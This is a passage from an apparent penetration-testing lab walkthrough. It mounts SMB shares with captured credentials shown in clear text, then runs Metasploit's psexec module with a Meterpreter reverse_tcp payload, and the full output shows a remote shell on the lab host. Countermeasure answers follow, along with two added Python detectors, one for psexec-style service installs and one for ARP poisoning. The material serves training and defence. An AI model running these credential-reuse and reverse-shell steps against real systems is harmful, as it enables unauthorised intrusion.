5.2-) You should see a list of files that were transmitted via SMB. Note that there are two different files: the first one has 374 bytes and the other has 662 bytes. According to the screenshot above, probably one of the files is performance.doc and the other one is salaries.doc.

5.3-) Save all files to a folder of your preference and give them the .doc extension. Then open the files in order to see their content:

Task 11: Use the credentials gathered in order to see what access you can get on the host 172.16.5.10

With two different credentials in hand, check if you can access the following resources:

1-) \\172.16.5.10\finance
2-) \\172.16.5.10\technology
3-) Remote shell on 172.16.5.10

According to tasks 8.5 and 8.7, we have discovered the following credential:

Username: admin
Password: et1@sr7!

According to task 9.1, we have discovered the credential below:

Username: almir
Password: Corinthians2012

Now, all we need to do is to test the credentials above in order to see which one can access each of the resources above.

11.1 Testing access to the UNC share: \\172.16.5.10\finance

1-) We can use the command smbmount in order to mount a UNC share on our Linux system. To do this we will need to type:

smbmount //172.16.5.10/finance /tmp/finance -o 'username=almir,password=Corinthians2012,rw'

11.2 Testing access to the UNC share: \\172.16.5.10\technology

1-) We can use the command smbmount in order to mount a UNC share on our Linux system. To do this we will need to type:

smbmount //172.16.5.10/technology /tmp/technology -o 'username=admin,password=et1@sr7!'

11.3 Testing if you are able to get a remote shell on 172.16.5.10

1-) Once we have two valid credentials we might want to try to get a remote shell by using the PSEXEC exploit. In order to do that, open the Metasploit Console (msfconsole) and prepare the exploit according to the parameters below:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set SMBUser admin
SMBUser => admin
msf exploit(psexec) > set SMBPass et1@sr7!
SMBPass => et1@sr7!
msf exploit(psexec) > set RHOST 172.16.5.10
RHOST => 172.16.5.10
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 172.16.5.101    (Pentester IP address)
LHOST => 172.16.5.101
msf exploit(psexec) > exploit

2-) Once you run the exploit above, you will see that you are able to get a remote shell on the host 172.16.5.10 successfully, since the credential used (admin) is also a local administrator account for that particular host:

[*] Started reverse handler on 172.16.5.101:4444
[*] Connecting to the server...
[*] Authenticating to 172.16.5.10:445 WORKGROUP as user 'admin'...
[*] Uploading payload...
[*] Created \gntqvmkk.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.5.10[\svcctl]...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.5.10[\svcctl]...
[*] Obtaining a service manager handle...
[*] Creating a new service (ZdlTfEpQ - "MSTOPiQJKeoqes")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (752128 bytes) to 172.16.5.10
[*] Closing service handle...
[*] Deleting \gntqvmkk.exe...
[*] Meterpreter session 1 opened (172.16.5.101:4444 -> 172.16.5.10:1594) at 2012-11-18 18:55:11-0200

meterpreter > shell
Process 3716 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>hostname
hostname
els-winser2003

C:\WINDOWS\system32>

Task 12: Countermeasures

List at least one countermeasure that your client could implement for some of the issues identified during the test:

1. What protocol can be used on the http://intranet.sportsfoo.com website in order to prevent credentials from being transmitted in clear text?

Answer: SSL

2. What protocol or tool can be used as a replacement for the FTP service in use on the host ftp.sportsfoo.com?

Answer: SFTP

3. What protocol can be used to ensure that all traffic between the file server and any other host on the LAN is encrypted?

Answer: IPSEC

4. What countermeasure can be implemented in order to protect the network against ARP poisoning attacks?

Answer: You can use static ARP entries
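The Task 11.3 transcript shows what the client's host would have recorded from the defender's side: a randomly named .exe uploaded to the host, a service with a random 8-letter name created to run it, and both removed seconds later. Windows writes every service installation to the System log as Event ID 7045. The following is an added example, not code from the lab, from eLearnSecurity or from Metasploit: it scans a handful of constructed 7045-style records and flags the ones that match that pattern. The image path %SystemRoot%\gntqvmkk.exe is an assumption (the transcript only shows "\gntqvmkk.exe" being created), and the record fields are constructed, not real log output.

```python
# Added example (not part of the original lab): flag Windows "service installed"
# records (System log Event ID 7045) that look like the short-lived, random-named
# service seen in the Task 11.3 transcript. Records are constructed for this example.
import re

# Constructed 7045-style records; the first one mirrors the lab transcript
# (service ZdlTfEpQ running a random-named .exe in the Windows directory, which is
# the ADMIN$ share root; the exact path is an assumption), the others are ordinary.
SAMPLE_7045_EVENTS = [
    {"time": "2012-11-18 18:55:10", "service_name": "ZdlTfEpQ",
     "image_path": r"%SystemRoot%\gntqvmkk.exe", "account": "LocalSystem"},
    {"time": "2012-11-18 09:12:44", "service_name": "wuauserv",
     "image_path": r"%SystemRoot%\system32\svchost.exe -k netsvcs",
     "account": "LocalSystem"},
    {"time": "2012-11-18 10:03:01", "service_name": "BackupAgent",
     "image_path": r"C:\Program Files\Backup\agent.exe",
     "account": r"NT AUTHORITY\NetworkService"},
]

VOWELS = set("aeiouAEIOU")


def looks_random(name):
    """Heuristic: exactly 8 letters and either nearly vowel-free or with
    frequent case changes, like ZdlTfEpQ or gntqvmkk. Real service names such as
    wuauserv are vowel-rich and single-case, so they pass."""
    if not re.fullmatch(r"[A-Za-z]{8}", name):
        return False
    vowels = sum(c in VOWELS for c in name)
    case_switches = sum(1 for a, b in zip(name, name[1:])
                        if a.isupper() != b.isupper())
    return vowels <= 1 or case_switches >= 3


def exe_in_windows_root(image_path):
    """Return the executable file name when the service binary sits directly in
    the Windows directory (%SystemRoot%, C:\\WINDOWS or a \\\\host\\ADMIN$ UNC path),
    which is where a tool that uploads through ADMIN$ drops its file. Otherwise None."""
    exe = re.split(r"\s+-", image_path)[0].strip('"')   # drop "-k netsvcs"-style args
    m = re.fullmatch(
        r"(?:%SystemRoot%|[A-Za-z]:\\WINDOWS|\\\\[^\\]+\\ADMIN\$)\\([^\\]+\.exe)",
        exe, re.IGNORECASE)
    return m.group(1) if m else None


def flag_psexec_like_services(events):
    """Return one alert per 7045 record that shows the random-name pattern."""
    alerts = []
    for ev in events:
        reasons = []
        if looks_random(ev["service_name"]):
            reasons.append("random-looking service name")
        exe = exe_in_windows_root(ev["image_path"])
        if exe and looks_random(exe[:-len(".exe")]):
            reasons.append("random-looking binary directly in the Windows directory")
        if reasons:
            alerts.append({"time": ev["time"],
                           "service_name": ev["service_name"],
                           "image_path": ev["image_path"],
                           "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in flag_psexec_like_services(SAMPLE_7045_EVENTS):
        print(alert)
```

Only the ZdlTfEpQ record is flagged, and with both reasons. In practice this check is paired with a 7036 "service entered the stopped state" or a second 7045 within a few seconds, and with the SMB logon of the same account from the pentester's address, which is exactly the chain the transcript shows.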
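Static ARP entries (the answer to question 4) stop a host from accepting a poisoned mapping, but they do not tell you that poisoning is being attempted. The following is an added example, not code from the lab or from eLearnSecurity: it applies the two classic ARP poisoning indicators to a stream of ARP replies, namely an IP address whose sender MAC changes and one MAC address claiming several IP addresses. The replies and the MAC addresses below are constructed, and 172.16.5.1 is assumed to be the lab's gateway.

```python
# Added example (not part of the original lab): detect ARP cache poisoning
# indicators from a sequence of ARP replies (sender IP, sender MAC).
# Sample replies and MAC addresses are constructed for this example.
from collections import defaultdict

# Constructed replies in capture order: the gateway 172.16.5.1 (assumed) and the
# file server 172.16.5.10 answer normally, then a third MAC claims both addresses.
SAMPLE_ARP_REPLIES = [
    ("172.16.5.1", "aa:bb:cc:00:00:01"),
    ("172.16.5.10", "aa:bb:cc:00:00:10"),
    ("172.16.5.1", "de:ad:be:ef:00:99"),
    ("172.16.5.10", "de:ad:be:ef:00:99"),
]


def detect_arp_poisoning(replies, trusted=None):
    """Return a list of alerts. `trusted` is an optional {ip: mac} table (the same
    information a static ARP entry would hold); without it the first mapping seen
    for each IP is taken as the baseline. A conflicting reply never overwrites the
    baseline, so a poisoning attempt keeps alerting for as long as it continues."""
    ip_to_mac = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        known = ip_to_mac.get(ip)
        if known is None:
            ip_to_mac[ip] = mac          # first sighting becomes the baseline
        elif known != mac:
            alerts.append(("ip_mac_change", ip, known, mac))
        # one MAC answering for several IPs is the other tell-tale of a
        # man-in-the-middle position; alert once per newly claimed IP
        if mac_to_ips[mac] and ip not in mac_to_ips[mac]:
            alerts.append(("mac_multiple_ips", mac,
                           tuple(sorted(mac_to_ips[mac] | {ip}))))
        mac_to_ips[mac].add(ip)
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP_REPLIES):
        print(alert)
```

On the constructed input the third reply raises an ip_mac_change alert for the gateway, and the fourth raises both an ip_mac_change for the file server and a mac_multiple_ips alert for the MAC now answering for both. The `trusted` table is the detection-side twin of the static entry countermeasure: on Linux the entry itself is pinned with `ip neigh add 172.16.5.1 lladdr aa:bb:cc:00:00:01 dev eth0 nud permanent` (or the older `arp -s 172.16.5.1 aa:bb:cc:00:00:01`), which is practical for a small number of critical hosts such as the gateway and the file server rather than for every machine on the LAN.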